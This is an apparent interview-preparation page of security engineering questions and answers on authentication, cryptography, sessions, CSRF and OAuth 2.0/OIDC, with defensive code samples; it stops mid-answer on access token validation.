🔐 Security OAuth · Cryptography Zero-Trust · OWASP ~85 questions

Security Engineering

A complete set of senior-level security engineering interview questions covering authentication and authorization, cryptography fundamentals, OAuth 2.0 and OIDC, JWT pitfalls, web application security, TLS and network security, secrets management, zero-trust architecture, threat modeling, and secure development practices.

No questions match your search. Try a different keyword.

Authentication & Authorization

8 questions

1What is the difference between authentication and authorization? What are common models for each?

Authentication (AuthN) — verifying identity: "Who are you?" Establishes that the entity is who they claim to be.

Authorization (AuthZ) — verifying permissions: "What are you allowed to do?" Determines what actions an authenticated identity may perform.

Authentication factors:

Something you know: password, PIN, security questions
Something you have: TOTP app, hardware key (YubiKey), SMS code
Something you are: fingerprint, face ID, retina scan
MFA: combining two or more factors — the gold standard for sensitive systems

Authorization models:

DAC (Discretionary Access Control): resource owners grant access. POSIX file permissions. Flexible but hard to audit at scale.
MAC (Mandatory Access Control): system-enforced labels (Top Secret, Secret, Unclassified). Used in military/government. SELinux.
RBAC (Role-Based Access Control): permissions attached to roles, users assigned to roles. Most common in enterprise apps. Admin, Editor, Viewer.
ABAC (Attribute-Based Access Control): policies based on attributes of user, resource, and environment. "Allow access if user.department == resource.owner_dept AND time is business_hours." More expressive but complex.
ReBAC (Relationship-Based Access Control): access based on relationship graph. Google Zanzibar model. "User can edit doc if they are the owner or have editor relation to it." Used in Google Drive, GitHub.

2How should passwords be stored securely? What makes bcrypt, Argon2, and scrypt appropriate?

Passwords must never be stored in plaintext or as reversible encrypted values. They must be stored as one-way hashes designed to be computationally expensive to crack.

What NOT to use: MD5, SHA-1, SHA-256 — fast hashes designed for integrity checking, not password storage. A GPU can compute billions per second. A stolen hash database can be cracked with rainbow tables or brute force.

Requirements for password hashing:

Slow by design: each verification should take ~100ms — acceptable for login, catastrophic for attackers running millions of guesses
Salt: unique random value per user concatenated before hashing — prevents rainbow table attacks and ensures two users with the same password have different hashes
Memory-hard: requires significant RAM to compute — defeats GPU/ASIC attacks which have memory constraints

# Python — always use a modern library, never roll your own
import bcrypt
from argon2 import PasswordHasher

# bcrypt — adaptive, work factor configurable (rounds)
hashed = bcrypt.hashpw(password.encode(), bcrypt.gensalt(rounds=12))
bcrypt.checkpw(password.encode(), hashed)  # True/False

# Argon2id — OWASP and NIST recommended as of 2023
# Winner of Password Hashing Competition, memory-hard
ph = PasswordHasher(time_cost=2, memory_cost=65536, parallelism=2)
hash = ph.hash(password)
ph.verify(hash, password)   # raises VerifyMismatchError if wrong

# Current recommendation (OWASP 2024):
# 1st choice: Argon2id (m=64MB, t=2, p=1)
# 2nd choice: bcrypt (rounds=10 minimum, 12 preferred)
# 3rd choice: scrypt (N=2^17, r=8, p=1)

Pepper: A server-side secret appended to all passwords before hashing. Unlike salt (stored with the hash), pepper is a secret value stored separately (env var / secrets manager). If the database is compromised but the application server isn't, peppered hashes are worthless to the attacker even with brute force.

3What is RBAC and how do you implement it at scale? What are its limitations vs ABAC?

RBAC assigns permissions to roles rather than directly to users. Users are then assigned to roles. This indirection makes permission management tractable at scale — you change a role, not thousands of user records.

# Core RBAC tables:
# users(id, email, ...)
# roles(id, name)              -- admin, editor, viewer, billing_manager
# permissions(id, resource, action)  -- "posts", "create"
# user_roles(user_id, role_id)
# role_permissions(role_id, permission_id)

# Check permission:
def has_permission(user_id, resource, action):
    return db.query("""
        SELECT 1 FROM user_roles ur
        JOIN role_permissions rp ON rp.role_id = ur.role_id
        JOIN permissions p ON p.id = rp.permission_id
        WHERE ur.user_id = $1
          AND p.resource = $2
          AND p.action = $3
    """, user_id, resource, action).rowcount > 0

# Hierarchical RBAC: roles inherit from parent roles
# admin > editor > viewer (admin has all editor + viewer perms)

# Scoped RBAC: role applies only within a scope (org, project, team)
# user_roles(user_id, role_id, scope_type, scope_id)
# "Alice is admin of org:123 but viewer of org:456"

RBAC limitations:

Role explosion: Fine-grained needs lead to hundreds of roles that become unmanageable
Context blindness: Can't express "can read this document only during business hours" or "can approve only purchases under $10K"
Static: Can't express dynamic conditions based on resource attributes

ABAC adds: arbitrary policy conditions on user attributes (department, clearance), resource attributes (classification, owner), and environmental attributes (time, IP, location). More powerful but policy management is complex — use Open Policy Agent (OPA) or Cedar for policy-as-code.

4What is session management? How do you design secure sessions and prevent fixation/hijacking?

# Secure session design:
import secrets
import redis

def create_session(user_id):
    session_id = secrets.token_urlsafe(32)   # 256 bits of entropy
    session_data = {
        "user_id": user_id,
        "created_at": time.time(),
        "ip": request.remote_addr,           # optional: bind to IP
        "user_agent": request.user_agent.string,
    }
    redis.setex(f"session:{session_id}", 3600, json.dumps(session_data))  # 1hr TTL
    return session_id

# Set cookie with all security flags:
response.set_cookie(
    "session_id",
    value=session_id,
    httponly=True,    # JS cannot read — prevents XSS theft
    secure=True,      # HTTPS only
    samesite="Lax",   # CSRF protection
    max_age=3600,
    path="/",
)

Session fixation attack: Attacker sets a known session ID before victim logs in (via URL parameter or cookie injection). After login, attacker uses the known ID. Fix: Always regenerate the session ID after login.

Session hijacking: Stealing an active session cookie via XSS, network sniffing, or log exposure. Mitigations: HttpOnly + Secure cookie flags; HSTS; rotate session IDs after privilege escalation; bind sessions to IP/user-agent (trade-off vs usability); short TTLs with sliding expiry; re-authenticate for sensitive operations.

Absolute vs sliding timeout: Absolute timeout invalidates the session regardless of activity (e.g., 8 hours). Sliding timeout resets on each request (e.g., 30 min of inactivity). Use both for sensitive applications.

5What is multi-factor authentication (MFA)? Compare TOTP, FIDO2/WebAuthn, and SMS.

TOTP (Time-based One-Time Password — RFC 6238): Shared secret generates a 6-digit code every 30 seconds using HMAC-SHA1. Used by Google Authenticator, Authy. Resistant to replay attacks (codes expire). Vulnerable to real-time phishing (attacker relays your code immediately). Secret theft compromises all future codes.

# TOTP verification:
import pyotp
secret = pyotp.random_base32()   # stored securely per user at enrollment
totp = pyotp.TOTP(secret)
totp.now()                       # current code
totp.verify("123456")            # True/False, checks ±1 window for clock drift

FIDO2/WebAuthn (the gold standard): Cryptographic challenge-response using public key cryptography. The authenticator (hardware key like YubiKey, or platform authenticator like Touch ID) holds a private key that never leaves the device. The server stores only the public key.

Phishing-resistant: The challenge is bound to the origin (website domain) — a fake site gets a response that won't work on the real site
No shared secret: Nothing to steal from the server
Passkeys: WebAuthn credentials synced via iCloud/Google — passwordless AND phishing-resistant

SMS OTP (weakest): Code sent via text message. Vulnerable to: SIM swapping (attacker convinces carrier to transfer your number), SS7 protocol interception, phone number porting attacks. NIST deprecated SMS OTP for sensitive use cases in SP 800-63B. Better than nothing for consumer apps, not acceptable for high-value accounts.

Recommendation hierarchy: FIDO2/Passkeys > TOTP app > Push notification (Duo) > Email OTP > SMS OTP > Security questions (avoid entirely).

6What is the principle of least privilege? How do you implement it in a real system?

The principle of least privilege (PoLP) states that any entity (user, service, process) should have only the minimum permissions required to perform its function, and nothing more. Limits the blast radius of any compromise.

Implementation at different layers:

Database: Application user has SELECT/INSERT/UPDATE but not DROP/CREATE/ALTER. Separate read-only replicas for analytics. Each microservice has its own DB user scoped to its tables only.
IAM / Cloud: Service accounts scoped to specific resources and actions. No wildcard * permissions. AWS IAM: use resource ARNs in policies, not arn:aws:s3:::*. Enable SCPs (Service Control Policies) at org level.
OS: Services run as non-root users. Containers drop all Linux capabilities except those needed. seccomp profiles restrict system calls.
API keys: Scoped to specific operations. Read-only tokens for read-only consumers. Separate keys per integration.

# AWS IAM — least privilege example:
{
  "Effect": "Allow",
  "Action": ["s3:GetObject", "s3:PutObject"],
  "Resource": "arn:aws:s3:::my-app-uploads/*"
}
# NOT: "Action": ["s3:*"], "Resource": "*"

# Kubernetes — non-root, read-only filesystem:
securityContext:
  runAsNonRoot: true
  runAsUser: 1000
  readOnlyRootFilesystem: true
  allowPrivilegeEscalation: false
  capabilities:
    drop: ["ALL"]

Just-in-time (JIT) access: Grant elevated access only when needed, for a bounded time. Better than standing admin privileges. Implemented by tools like HashiCorp Boundary, AWS IAM Identity Center, CyberArk.

7What is CSRF and how do you defend against it? When is SameSite cookie enough?

CSRF (Cross-Site Request Forgery): An attacker tricks a victim's browser into making an authenticated request to a target site. The browser automatically includes cookies, so a malicious page at evil.com can trigger a POST to bank.com using the victim's session.

# Attack scenario:
# Victim is logged into bank.com (session cookie set)
# Victim visits evil.com which contains:
# 
# or ...auto-submit

# Defense 1: CSRF tokens (classic, always works)
# Server generates a random token, stored in session AND sent in form/header
# On every state-changing request, verify token matches
import secrets
def generate_csrf_token(session_id):
    token = secrets.token_urlsafe(32)
    redis.set(f"csrf:{session_id}", token, ex=3600)
    return token

def verify_csrf(session_id, token):
    stored = redis.get(f"csrf:{session_id}")
    return stored and secrets.compare_digest(stored, token)

# In form: 
# In AJAX: X-CSRF-Token header
# Server validates on every POST/PUT/DELETE/PATCH

# Defense 2: SameSite cookies
Set-Cookie: session=abc123; SameSite=Strict  # never sent cross-site
Set-Cookie: session=abc123; SameSite=Lax     # sent only on top-level navigation GETs

When is SameSite=Lax enough? For most modern web apps where you control the full authentication flow, SameSite=Lax prevents CSRF for state-changing requests (POST/PUT/DELETE are not sent cross-site). It's now the browser default. However, you still need explicit CSRF tokens if: supporting very old browsers; using GET requests for state changes (avoid this); or when subdomain attacks are a concern (a.example.com can set cookies for .example.com).

8What is SSO (Single Sign-On)? How does SAML work and how does it compare to OIDC?

SSO allows users to authenticate once and access multiple applications without re-entering credentials. The identity is asserted by a central Identity Provider (IdP) to multiple Service Providers (SPs).

SAML 2.0 (Security Assertion Markup Language): XML-based protocol, enterprise-focused, introduced in 2005. The IdP issues signed XML assertions. Primarily used for web browser SSO in enterprise contexts (Okta, Azure AD, ADFS).

SAML SP-initiated flow:

User accesses SP (app.company.com)
SP redirects to IdP with AuthnRequest
IdP authenticates user (login page)
IdP POSTs signed SAML Response (XML) to SP's ACS URL
SP validates signature, extracts user attributes, creates session

OIDC vs SAML:

Format: OIDC uses JSON/JWT; SAML uses XML — OIDC is simpler to parse and implement
Transport: OIDC uses REST APIs; SAML uses HTTP redirects/POST with XML documents
Mobile/API: OIDC works naturally for SPAs, mobile apps, and API-to-API auth; SAML is browser-only
Modern preference: OIDC for new consumer and developer-facing apps; SAML still required for enterprise legacy integrations
Key similarity: Both use a central IdP, both issue signed assertions, both support attribute passing

Cryptography Fundamentals

9 questions

1What is the difference between symmetric and asymmetric encryption? When do you use each?

Symmetric encryption: Same key for encryption and decryption. Fast (10-100× faster than asymmetric). Key distribution problem — how do you securely share the secret key?

Asymmetric encryption: Public key encrypts, private key decrypts (or: private key signs, public key verifies). Solves the key distribution problem — publish your public key freely. Computationally expensive.

In practice — hybrid encryption (best of both): TLS, PGP, and Signal all use this pattern:

Use asymmetric crypto to establish/exchange a symmetric key securely
Use symmetric crypto for the bulk data encryption

# Symmetric — AES-256-GCM (authenticated encryption):
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
import os

key = AESGCM.generate_key(bit_length=256)    # 32 bytes
nonce = os.urandom(12)                        # 96-bit nonce, unique per message
aesgcm = AESGCM(key)
ciphertext = aesgcm.encrypt(nonce, plaintext, associated_data)
plaintext   = aesgcm.decrypt(nonce, ciphertext, associated_data)
# GCM = Galois/Counter Mode: provides both confidentiality AND integrity
# NEVER reuse a nonce with the same key — catastrophic for GCM

# Asymmetric — RSA-OAEP:
from cryptography.hazmat.primitives.asymmetric import rsa, padding
key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
ciphertext = key.public_key().encrypt(message, padding.OAEP(
    mgf=padding.MGF1(hashes.SHA256()), algorithm=hashes.SHA256(), label=None))
# Use for encrypting small data (e.g., a symmetric key)
# RSA-2048 can encrypt at most 190 bytes with OAEP-SHA256

Use symmetric for: bulk data encryption, database field encryption, file encryption. Use asymmetric for: key exchange, digital signatures, certificate-based authentication.

2What is AES-GCM and why is it preferred over AES-CBC? What makes it "authenticated encryption"?

AES-CBC (Cipher Block Chaining): Encrypts in blocks, each block XORed with the previous ciphertext block. Provides confidentiality only — an attacker can flip bits in the ciphertext and predictably corrupt/modify the plaintext without detection. Requires separate MAC (HMAC) for integrity — easy to get wrong (encrypt-then-MAC vs MAC-then-encrypt ordering mistakes).

AES-GCM (Galois/Counter Mode): Combines CTR mode encryption (stream cipher from a counter) with GHASH authentication. Provides both confidentiality AND integrity (AEAD — Authenticated Encryption with Associated Data) in a single primitive.

# AES-GCM properties:
# - Authentication tag (128 bits): any ciphertext modification detected on decrypt
# - Associated Data (AAD): headers/metadata authenticated but not encrypted
#   (e.g., "to: Alice, from: Bob" authenticated but readable)
# - Nonce (IV): 96-bit recommended, must be UNIQUE per (key, message) pair
# - If nonce is reused: catastrophic — attacker can recover key material

# Padding oracle attacks on CBC:
# CBC requires padding to fill the last block (PKCS#7)
# If the server reveals "padding error" vs "MAC error" → attacker can decrypt
# GCM is a stream cipher — no padding needed, no padding oracle

# TLS 1.3 mandatory cipher suites — all AEAD:
# TLS_AES_128_GCM_SHA256
# TLS_AES_256_GCM_SHA384
# TLS_CHACHA20_POLY1305_SHA256  ← ChaCha20-Poly1305: AES alternative, fast without HW acceleration

# Nonce management strategy for AES-GCM:
# Option 1: random 96-bit nonce (safe up to ~2^32 messages per key — birthday problem)
# Option 2: deterministic counter (guarantees uniqueness — better for high volume)
# Option 3: AES-GCM-SIV (nonce-misuse resistant — tolerates nonce reuse at cost of performance)

3How do digital signatures work? What is the difference between signing and encrypting?

Signing: Proves authenticity and integrity. "This message came from me (private key holder) and hasn't been modified." Private key signs, public key verifies.

Encrypting: Provides confidentiality. "Only the recipient can read this." Public key encrypts, private key decrypts.

# How signing works:
# 1. Hash the message: h = SHA-256(message)
# 2. Sign the hash: sig = RSA_sign(private_key, h)  or  ECDSA_sign(private_key, h)
# 3. Send: (message, sig)
# Verification: h' = SHA-256(message); verify RSA_verify(public_key, sig) == h'

from cryptography.hazmat.primitives.asymmetric import ec, padding
from cryptography.hazmat.primitives import hashes

# ECDSA signing (preferred over RSA for new systems — smaller keys, faster)
private_key = ec.generate_private_key(ec.SECP256R1())
signature = private_key.sign(message, ec.ECDSA(hashes.SHA256()))
private_key.public_key().verify(signature, message, ec.ECDSA(hashes.SHA256()))

# Ed25519 — modern, fast, simple, no nonce required (preferred)
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey
private_key = Ed25519PrivateKey.generate()
signature = private_key.sign(message)
private_key.public_key().verify(signature, message)

# Common confusion — you can combine both:
# Encrypted + Signed message:
# sig = sign(private_A, message)      # A signs
# ciphertext = encrypt(public_B, message || sig)  # encrypted for B
# B decrypts, gets message + sig, verifies sig with A's public key

Non-repudiation: Only the holder of the private key can produce a valid signature. The signer cannot later deny having signed the message — important for contracts, audit logs, code signing.

4What is a cryptographic hash function? What properties must it have and what are they used for?

A cryptographic hash function maps arbitrary input to a fixed-size digest. Three required properties:

Pre-image resistance: Given h, it's computationally infeasible to find m such that H(m) = h. "One-way function."
Second pre-image resistance: Given m₁, infeasible to find m₂ ≠ m₁ such that H(m₁) = H(m₂).
Collision resistance: Infeasible to find any m₁ ≠ m₂ such that H(m₁) = H(m₂). Strongest property — collision resistance implies second pre-image resistance.

# Current recommendations (2024):
# SHA-256 (256-bit output): general purpose, widely used, still secure
# SHA-3 (Keccak): different design from SHA-2, good as backup/alternative
# BLAKE3: fastest, modern, secure — use for checksums and performance-sensitive work

# BROKEN (do not use for security):
# MD5: collisions trivially found (seconds on a laptop)
# SHA-1: collision demonstrated in 2017 (SHAttered attack)

import hashlib
sha256 = hashlib.sha256(data).hexdigest()
sha3   = hashlib.sha3_256(data).hexdigest()

# Applications:
# File integrity: hash(file) → verify download not corrupted
# Digital signatures: sign(hash(message)) — avoid signing variable-length data
# Password storage: bcrypt/Argon2 (built on hash functions but slow by design)
# HMAC (message authentication): HMAC(key, message) — keyed hash for MAC
# Merkle trees: hash(hash(left) + hash(right)) — used in git, blockchain, certificate transparency
# Key derivation: HKDF (HMAC-based KDF) — derive multiple keys from one secret

Length extension attacks: SHA-256 is vulnerable to length extension — given H(m), you can compute H(m‖extra) without knowing m. Use HMAC (which pads the key internally) instead of H(key‖message) for MACs. SHA-3 and BLAKE3 are immune to length extension.

5What is Diffie-Hellman key exchange? How does ECDH work and why is forward secrecy important?

Diffie-Hellman allows two parties to establish a shared secret over an insecure channel without prior shared secrets. Neither party transmits the secret — they each contribute half and derive the same value.

# Diffie-Hellman (simplified):
# Public parameters: prime p, generator g
# Alice: private a, public A = g^a mod p
# Bob:   private b, public B = g^b mod p
# Both send their public values. Shared secret:
# Alice: S = B^a mod p = g^(ab) mod p
# Bob:   S = A^b mod p = g^(ab) mod p
# Attacker sees A and B but cannot compute g^(ab) — Discrete Log Problem

# ECDH (Elliptic Curve DH): same math, smaller keys
# 256-bit ECDH key ≈ 3072-bit DH in security level
from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey

alice_private = X25519PrivateKey.generate()
bob_private   = X25519PrivateKey.generate()

# Exchange public keys:
alice_public = alice_private.public_key()
bob_public   = bob_private.public_key()

# Compute shared secrets (identical):
alice_shared = alice_private.exchange(bob_public)
bob_shared   = bob_private.exchange(alice_public)
assert alice_shared == bob_shared  # True

Perfect Forward Secrecy (PFS/FS): Use ephemeral DH keys — generate fresh DH key pairs for every session, discard after use. Even if the server's long-term private key is compromised later, past session traffic cannot be decrypted. Without PFS: capture all traffic now, decrypt later when you steal the private key ("harvest now, decrypt later"). TLS 1.3 requires ephemeral DH (ECDHE), making PFS mandatory.

6What is a PKI (Public Key Infrastructure)? How do X.509 certificates and certificate chains work?

PKI solves the public key authentication problem: how do you know the public key you received actually belongs to the entity you think it does? A Certificate Authority (CA) signs certificates that bind a public key to an identity.

# X.509 certificate fields:
Subject: CN=api.example.com, O=Example Corp
Issuer: CN=Let's Encrypt R3  (intermediate CA)
Public Key: EC 256-bit (the server's public key)
Validity: 2024-01-01 to 2024-04-01  (90 days for Let's Encrypt)
Subject Alt Names: api.example.com, www.example.com
Signature: 

# Certificate chain:
# Root CA (self-signed, in OS trust store) → Intermediate CA → End-entity cert
# Browser verifies: end-entity signed by intermediate, intermediate signed by root
# Root CA's private key is air-gapped — never touches the internet
# Intermediate CAs do the actual signing of leaf certs

# Why intermediates? If intermediate is compromised, only revoke the intermediate.
# Root CA rotation would invalidate all certs globally.

# Certificate Transparency (CT):
# All publicly-trusted certs must be logged in public CT logs
# Protects against misissued certs — you can monitor for certs issued for your domain

Certificate validation steps: Verify signature chain up to trusted root; check validity period (not expired); check revocation (CRL or OCSP); verify hostname matches Subject/SAN; check key usage extensions (cert is authorized for the purpose used).

Certificate pinning: App hardcodes the expected certificate or public key hash. Protects against compromised CAs issuing fraudulent certs. Used by mobile apps and high-security services. Risk: cert rotation breaks the app if pin isn't updated — use with backup pins.

7What is HMAC and how does it differ from a plain hash? When do you use each?

# HMAC(key, message) = H(key ⊕ opad || H(key ⊕ ipad || message))
# Two nested hash operations with key derivation — immune to length extension

import hmac, hashlib, secrets

key = secrets.token_bytes(32)    # 256-bit secret key
message = b"transfer $1000 to Alice"

mac = hmac.new(key, message, hashlib.sha256).digest()

# Verification — always use compare_digest (constant time!) to prevent timing attacks:
def verify_mac(key, message, received_mac):
    expected = hmac.new(key, message, hashlib.sha256).digest()
    return hmac.compare_digest(expected, received_mac)  # NOT: expected == received_mac

Hash (no key) vs HMAC (with key):

Hash: Anyone can compute it. Use for integrity where secret isn't needed: file checksums, content addressing, digital signatures (sign the hash).
HMAC: Only parties with the key can compute it. Use for authentication: API request signing, CSRF tokens, cookie integrity, webhook signature verification (Stripe uses HMAC-SHA256 for webhook signatures).

Timing attack on MAC comparison: A naive received == expected comparison short-circuits on the first different byte — an attacker can measure response time to guess the MAC byte by byte. hmac.compare_digest() always compares all bytes — constant time regardless of where they differ.

8What is key derivation? Explain PBKDF2, HKDF, and when you need key stretching.

# PBKDF2 (Password-Based Key Derivation Function 2):
# Stretches low-entropy passwords into cryptographic keys
# Applies hash function many times (iterations) to make brute force expensive
import hashlib
key = hashlib.pbkdf2_hmac(
    'sha256',
    password.encode(),
    salt,                  # random, unique per user
    iterations=600000,     # OWASP 2023 recommendation for PBKDF2-SHA256
    dklen=32               # 256-bit output key
)
# 600K iterations: ~300ms on modern CPU — acceptable for login, costly for attackers

# HKDF (HMAC-based Key Derivation Function — RFC 5869):
# For deriving MULTIPLE keys from a SINGLE high-entropy secret (not for passwords)
# Two-step: Extract (add entropy to fixed-length PRK) + Expand (derive output keying material)
from cryptography.hazmat.primitives.kdf.hkdf import HKDF
hkdf = HKDF(
    algorithm=hashes.SHA256(),
    length=32,
    salt=salt,             # optional, can be None
    info=b"aes-key",       # context string — different info = different key
)
derived_key = hkdf.derive(shared_secret)  # from DH exchange or master key

# Use HKDF to derive multiple keys from one secret:
enc_key = HKDF(..., info=b"encryption-key").derive(master)
mac_key = HKDF(..., info=b"mac-key").derive(master)
# Different info strings = independent keys, no correlation

# When to use which:
# Passwords (low entropy input): PBKDF2, bcrypt, Argon2, scrypt
# High-entropy secret (DH output, random key): HKDF
# Envelope encryption (wrap a DEK with a KEK): AES-KW (Key Wrap) or AES-GCM

9What are common cryptographic mistakes and anti-patterns to avoid?

Rolling your own crypto: The cardinal sin. Even cryptographers make mistakes. Use well-audited libraries (libsodium, cryptography.io). "Don't roll your own crypto" is not just a meme — it's the most important rule.
Using ECB mode: AES-ECB encrypts identical plaintext blocks to identical ciphertext blocks — reveals patterns. The "ECB penguin" (encrypting a penguin bitmap shows the penguin shape). Never use ECB for anything.
Nonce reuse in AES-GCM: Reusing a nonce with the same key completely breaks GCM — an attacker can recover the authentication key and decrypt/forge messages. Use random 12-byte nonces and count messages.
Comparing MACs with ==: Timing attack. Always use hmac.compare_digest().
Using MD5/SHA-1 for security: Both are broken for collision resistance. Fine for non-security checksums (file dedup), not for signing or integrity in adversarial settings.
Hardcoding keys/secrets: Keys in source code end up in git history, CI logs, container images. Use a secrets manager.
Encrypting but not authenticating (CBC without MAC): Attacker can flip bits in ciphertext without detection. Always use authenticated encryption (AES-GCM, ChaCha20-Poly1305) or encrypt-then-MAC.
Insufficient entropy for key generation: Using random.random() (not cryptographically secure) for key generation. Always use secrets module in Python, /dev/urandom/crypto.getRandomValues().

OAuth 2.0 & OIDC

9 questions

1What is OAuth 2.0 and what problem does it solve? Explain the core roles.

OAuth 2.0 is an authorization framework that allows a third-party application to obtain limited access to a resource on behalf of a user, without the user sharing their credentials with that third party.

The problem it solves: Before OAuth, the only way to let an app access your data (e.g., "sign in with Google to read your calendar") was to give the app your password. If the app was compromised, your credential was too. OAuth delegates scoped authorization without credential sharing.

Core roles:

Resource Owner: The user who owns the data and grants access
Resource Server: The API server that holds the protected resources (Google Calendar API)
Authorization Server: Issues access tokens after authenticating the resource owner (Google's OAuth server)
Client: The third-party application requesting access (your calendar app)

# OAuth 2.0 token types:
# Access Token: short-lived (minutes–hours), used to call the Resource Server API
# Refresh Token: long-lived (days–weeks), used to get new access tokens without re-login
# Authorization Code: short-lived one-time code, exchanged for access token at token endpoint

# Scopes: fine-grained permissions requested by the client
# "read:email profile openid calendar.readonly"
# Resource Owner approves specific scopes — not all-or-nothing

OAuth 2.0 itself is only an authorization framework, not an authentication protocol. It doesn't define how to verify who the user is — that's what OIDC adds on top.

2Walk through the Authorization Code flow with PKCE. Why is PKCE required for public clients?

Authorization Code flow is the most secure OAuth flow for applications that need ongoing access. PKCE (Proof Key for Code Exchange, RFC 7636) prevents authorization code interception attacks in public clients (SPAs, mobile apps) that can't keep a client_secret.

# Step 1: Client generates PKCE challenge
import secrets, hashlib, base64
code_verifier  = secrets.token_urlsafe(64)        # random 64-byte string, kept secret
code_challenge = base64.urlsafe_b64encode(
    hashlib.sha256(code_verifier.encode()).digest()
).rstrip(b'=').decode()

# Step 2: Redirect user to Authorization Server
GET /authorize?
  response_type=code
  &client_id=my-app
  &redirect_uri=https://myapp.com/callback
  &scope=openid profile email
  &state=random_csrf_token     ← MUST validate this on return
  &code_challenge=
  &code_challenge_method=S256

# Step 3: User authenticates and approves scopes
# Authorization Server redirects back:
GET /callback?code=AUTH_CODE&state=random_csrf_token

# Step 4: Validate state, exchange code for tokens
POST /token
  grant_type=authorization_code
  &code=AUTH_CODE
  &redirect_uri=https://myapp.com/callback
  &client_id=my-app
  &code_verifier=   ← Authorization Server verifies SHA256(verifier)==challenge
# Returns: { access_token, id_token, refresh_token, expires_in }

# Why PKCE stops code interception:
# Attacker intercepts the authorization code (e.g., via malicious app on same device)
# Without the code_verifier, the code is useless — can't exchange for tokens
# Only the original requester knows code_verifier

PKCE is now recommended for ALL clients (RFC 9700, 2025 OAuth 2.1 draft), not just public clients — it provides defense in depth even for confidential clients using a client_secret.

3What OAuth flows exist and when do you use each? Why are Implicit and ROPC deprecated?

Authorization Code + PKCE: The correct choice for almost all user-facing applications — web apps, SPAs, mobile apps. The only flow that supports refresh tokens for SPAs. Use this.

Client Credentials: Machine-to-machine (M2M). No user involved. Service A calls Service B using its own client_id + client_secret. Returns an access token for the service's own identity.

# Client Credentials — used for microservice-to-microservice auth:
POST /token
  grant_type=client_credentials
  &client_id=payment-service
  &client_secret=secret123
  &scope=orders.read inventory.write
# Returns: access_token (no refresh token — just re-request when needed)

Device Code (Device Authorization Grant): For input-constrained devices (smart TV, CLI tools). Device displays a short code, user visits a URL on another device to approve. CLI tools like GitHub CLI use this.

Implicit flow (DEPRECATED): Returned access token directly in the URL fragment (no code exchange). Vulnerabilities: access token exposed in browser history, Referer headers, logs. Server-side apps can't distinguish redirect to legitimate client vs attacker. Never use.

Resource Owner Password Credentials / ROPC (DEPRECATED): User gives username/password directly to the client, which exchanges them for a token. Defeats the entire purpose of OAuth — the client sees the credentials. Only legacy migration justified this; OAuth 2.1 removes it entirely.

4What is OpenID Connect (OIDC)? How does it extend OAuth 2.0 for authentication?

OIDC is an authentication layer built on top of OAuth 2.0. OAuth 2.0 only handles authorization (access to resources). OIDC adds a standardized way to authenticate users and obtain their identity — it's "OAuth 2.0 + identity."

What OIDC adds to OAuth 2.0:

ID Token: A signed JWT containing user identity claims (sub, email, name, picture). Returned alongside the access token.
UserInfo endpoint: Standardized endpoint to fetch user profile data using the access token.
Standard scopes: openid (required), profile, email, address, phone
Discovery endpoint: /.well-known/openid-configuration — publishes all endpoints and supported capabilities

# OIDC ID Token claims:
{
  "iss": "https://accounts.google.com",    # issuer
  "sub": "110169484474386276334",          # subject (unique user ID at this IdP)
  "aud": "my-client-id",                  # audience (your client_id)
  "exp": 1735689600,                       # expiry
  "iat": 1735686000,                       # issued at
  "nonce": "random_nonce",                 # replay protection
  "email": "alice@example.com",
  "email_verified": true,
  "name": "Alice Smith",
  "picture": "https://..."
}

# Key validation steps for ID Token:
# 1. Verify signature using IdP's public keys (from JWKS endpoint)
# 2. Verify iss matches expected issuer
# 3. Verify aud matches your client_id
# 4. Verify exp hasn't passed
# 5. Verify nonce matches what you sent (replay protection)

Access token vs ID token: ID token is for the client — proves who the user is, read the claims directly. Access token is for the resource server — opaque bearer credential to call APIs, don't read its claims in the client unless it's a JWT with specific claims for your API.

5What is the state parameter and nonce in OAuth/OIDC? What attacks do they prevent?

# STATE parameter — prevents CSRF on the OAuth redirect
# Flow:
# 1. Client generates random state: state = secrets.token_urlsafe(32)
# 2. Client stores state in session: session["oauth_state"] = state
# 3. Include in authorization request: &state=
# 4. Authorization Server echoes it back in redirect: /callback?code=...&state=
# 5. Client MUST verify: session["oauth_state"] == returned_state
#    If they don't match → CSRF attack → reject!

# Attack without state:
# 1. Attacker initiates OAuth flow, gets to the consent screen
# 2. Attacker doesn't complete it — captures the authorization URL
# 3. Attacker tricks victim into visiting that URL (e.g., in an img tag)
# 4. Victim's browser completes the flow — attacker's account now linked to victim's session

# NONCE — prevents ID token replay attacks in OIDC
# 1. Client generates random nonce: nonce = secrets.token_urlsafe(32)
# 2. Client stores nonce (hashed) in session
# 3. Include in authorization request: &nonce=
# 4. Authorization Server embeds nonce in the ID Token
# 5. Client verifies nonce in received ID Token matches what was sent
#    If nonce was already used or doesn't match → replay → reject!

# Replay attack without nonce:
# Attacker captures a valid ID Token
# Attacker tries to use that same token at a different session/time
# Nonce check prevents this — token is bound to the specific auth request

import secrets
state = secrets.token_urlsafe(32)
nonce = secrets.token_urlsafe(32)
# Store both in session before redirect; validate both on callback

6How does token refresh work? What are the security considerations for refresh tokens?

# Token refresh flow:
POST /token
  grant_type=refresh_token
  &refresh_token=
  &client_id=my-app
  &client_secret=my-secret   # for confidential clients

# Returns:
{
  "access_token": "new_access_token",
  "expires_in": 3600,
  "refresh_token": "new_refresh_token",  # rotation
}

# Refresh token security best practices:

# 1. Refresh token rotation (RFC 6749 + best practice):
# Every use of a refresh token returns a NEW refresh token
# Old refresh token is immediately invalidated
# If attacker uses a stolen (already-used) refresh token → server detects reuse
# Server should revoke all tokens for that user on reuse detection (replay attack)

# 2. Sender-constrained refresh tokens (DPoP - RFC 9449):
# Bind token to a client's proof-of-possession key
# Even if token is stolen, attacker can't use it without the private key

# 3. Storage:
# Web app: HttpOnly, Secure, SameSite=Strict cookie (not localStorage!)
# Mobile: OS keychain (iOS) or Keystore (Android)
# Backend: encrypted in database
# NEVER: localStorage or sessionStorage (accessible to JS = XSS risk)

# 4. Short-lived access tokens + long-lived refresh tokens:
# Access token: 5-15 minutes (limits damage if stolen)
# Refresh token: 30 days with sliding expiry (balance security vs UX)

# 5. Absolute expiry:
# Even if refresh token is used regularly, force re-authentication after X days
# "You've been logged in for 90 days, please re-authenticate"

7What is the OAuth 2.0 token introspection and revocation? How do you validate access tokens?

# Two approaches to token validation at the Resource Server:

# Approach 1: Local JWT validation (preferred for performance)
# Resource Server validates the JWT signature using the Authorization Server's public keys
# No network call required — O(1) validation
# Drawback: can't know if token was revoked until it expires
import jwt
